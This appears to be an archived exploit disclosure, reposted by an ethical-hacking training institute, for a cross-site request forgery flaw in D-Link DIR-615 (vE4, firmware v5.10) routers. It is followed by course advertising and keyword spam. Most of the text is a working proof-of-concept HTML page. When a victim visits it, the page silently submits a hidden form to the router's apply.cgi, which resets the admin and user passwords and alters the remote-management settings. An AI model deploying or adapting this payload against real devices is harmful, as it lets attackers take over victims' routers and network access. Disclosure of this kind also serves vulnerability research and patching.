Dlink DIR-615 Hardware vE4 Firmware v5.10

Filename	Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability
Permission	rw-r--r--
Author	Unknown
Date and Time	2/25/2014
Label	Exploit\| Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

Cross Site Request Forgery :

This Modem's Web Application , suffers from Cross-site request forgery

through which attacker can manipulate user data via sending him malicious craft url.

The Modems's Application not using any security token to prevent it against CSRF. You can manipulate any userdata. PoC and Exploit to change user password:

In the POC the IP address in the POST is the modems IP address.

Code:

<html>

<body>

                <form id ="poc"action="http://192.168.0.1/apply.cgi"
method="POST">

      <input type="hidden" name="html_response_page"
value="back.asp" />

      <input type="hidden" name="html_response_message"
value="The setting is saved." />

      <input type="hidden" name="html_response_return_page"
value="login.asp" />

      <input type="hidden" name="reboot_type" value="none" />

      <input type="hidden" name="button1" value="Save Settings" />

      <input type="hidden" name="admin_password" value="test" />

      <input type="hidden" name="admin_password1" value="test" />

      <input type="hidden" name="admPass2" value="test" />

      <input type="hidden" name="user_password" value="test" />

      <input type="hidden" name="user_password1" value="test" />

      <input type="hidden" name="usrPass2" value="test" />

      <input type="hidden" name="hostname" value="DIR-615" />

      <input type="hidden" name="graphical_enable" value="1" />

      <input type="hidden" name="graph_auth_enable" value="1" />

      <input type="hidden" name="remote_http_management_enable"
value="0" />

      <input type="hidden"
name="remote_http_management_inbound_filter"
value="Allow_All" />

    </form>

</body>

<script
type="text/javascript">document.getElementById("poc").submit();</script>

</html>

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune

Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability Unknown rwxr-xr-x 0 2/25/2014 Exploit | Penetration